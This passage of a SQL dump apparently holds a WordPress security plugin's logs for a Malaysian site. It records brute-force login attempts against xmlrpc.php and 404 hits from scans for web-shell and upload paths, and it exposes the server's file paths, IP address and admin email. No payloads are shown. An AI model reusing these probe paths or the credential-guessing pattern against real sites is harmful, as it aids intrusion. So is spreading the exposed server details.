Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQrEmXkG1atThADMYGNQQAAANc\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"107.150.32.221\";s:11:\"REMOTE_PORT\";s:5:\"52558\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQrEmXkG1atThADMYGNQQAAANc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845714.7822\";s:12:\"REQUEST_TIME\";s:10:\"1566845714\";}}','notice','2019-08-26 18:55:17','2019-08-26 18:55:15',18309632,19592840,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'107.150.32.221'),(23206,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"356\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQriR90bn5mtr-PXqqz9AAAAEw\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"119.75.238.24\";s:11:\"REMOTE_PORT\";s:5:\"34310\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQriR90bn5mtr-PXqqz9AAAAEw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845833.4567\";s:12:\"REQUEST_TIME\";s:10:\"1566845833\";}}','notice','2019-08-26 18:57:15','2019-08-26 18:57:13',18313792,19504528,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'119.75.238.24'),(23207,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"337\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQrzxTEVi0fEJEHuDZFQQAAAAg\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"185.119.172.152\";s:11:\"REMOTE_PORT\";s:5:\"58456\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQrzxTEVi0fEJEHuDZFQQAAAAg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845903.6504\";s:12:\"REQUEST_TIME\";s:10:\"1566845903\";}}','notice','2019-08-26 18:58:26','2019-08-26 18:58:24',18307128,19588952,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'185.119.172.152'),(23208,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"338\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQr0x90bn5mtr-PXqq0CQAAAE4\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"45.40.167.4\";s:11:\"REMOTE_PORT\";s:5:\"58874\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQr0x90bn5mtr-PXqq0CQAAAE4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845907.4639\";s:12:\"REQUEST_TIME\";s:10:\"1566845907\";}}','notice','2019-08-26 18:58:29','2019-08-26 18:58:27',18316120,19505136,'http://bintara.com.my/blog/xmlrpc.php',1,0,'45.40.167.4'),(23209,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"338\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQsABTEVi0fEJEHuDZFTAAAAAI\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"27.254.87.142\";s:11:\"REMOTE_PORT\";s:5:\"44221\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQsABTEVi0fEJEHuDZFTAAAAAI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845952.4204\";s:12:\"REQUEST_TIME\";s:10:\"1566845952\";}}','notice','2019-08-26 18:59:15','2019-08-26 18:59:12',18306808,19592408,'http://bintara.com.my/blog/xmlrpc.php',1,0,'27.254.87.142'),(28582,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/blog/tag/logitech-rally/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2UVm1ncq3cUuJao9IcZgAAAII\";s:12:\"REDIRECT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.220\";s:11:\"REMOTE_PORT\";s:4:\"3814\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:10:\"SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa2UVm1ncq3cUuJao9IcZgAAAII\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571656792.9722\";s:12:\"REQUEST_TIME\";s:10:\"1571656792\";}}','notice','2019-10-21 11:19:57','2019-10-21 11:19:53',33815192,35618648,'https://bintara.com.my/blog/tag/logitech-rally/',1,0,'207.46.13.220'),(28581,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//Upfile_Dialog.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"118.25.196.47\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"118.25.196.47\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/Upfile_Dialog.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/Upfile_Dialog.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2UKKjZzpoQqaKQA3IeIQAAAMM\";s:12:\"REDIRECT_URL\";s:18:\"/Upfile_Dialog.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"59483\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/Upfile_Dialog.asp\";s:10:\"SCRIPT_URL\";s:18:\"/Upfile_Dialog.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2UKKjZzpoQqaKQA3IeIQAAAMM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571656745.2187\";s:12:\"REQUEST_TIME\";s:10:\"1571656745\";}}','notice','2019-10-21 11:19:08','2019-10-21 11:19:05',35271416,37070760,'http://bintara.com.my//Upfile_Dialog.asp',1,0,'118.25.196.47'),(28580,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//Upfile_Dialog.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"124.201.190.180\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"124.201.190.180\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/Upfile_Dialog.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/Upfile_Dialog.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2UIm1ncq3cUuJao9IcDwAAAJU\";s:12:\"REDIRECT_URL\";s:18:\"/Upfile_Dialog.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"59172\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/Upfile_Dialog.asp\";s:10:\"SCRIPT_URL\";s:18:\"/Upfile_Dialog.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2UIm1ncq3cUuJao9IcDwAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571656739.6797\";s:12:\"REQUEST_TIME\";s:10:\"1571656739\";}}','notice','2019-10-21 11:19:06','2019-10-21 11:19:00',35339000,37145064,'http://bintara.com.my//Upfile_Dialog.asp',1,0,'124.201.190.180'),(28578,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//e/member/2.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"210.211.2.250\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"210.211.2.250\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/e/member/2.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/e/member/2.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2UBqjZzpoQqaKQA3IeHQAAAMI\";s:12:\"REDIRECT_URL\";s:15:\"/e/member/2.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62645\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.co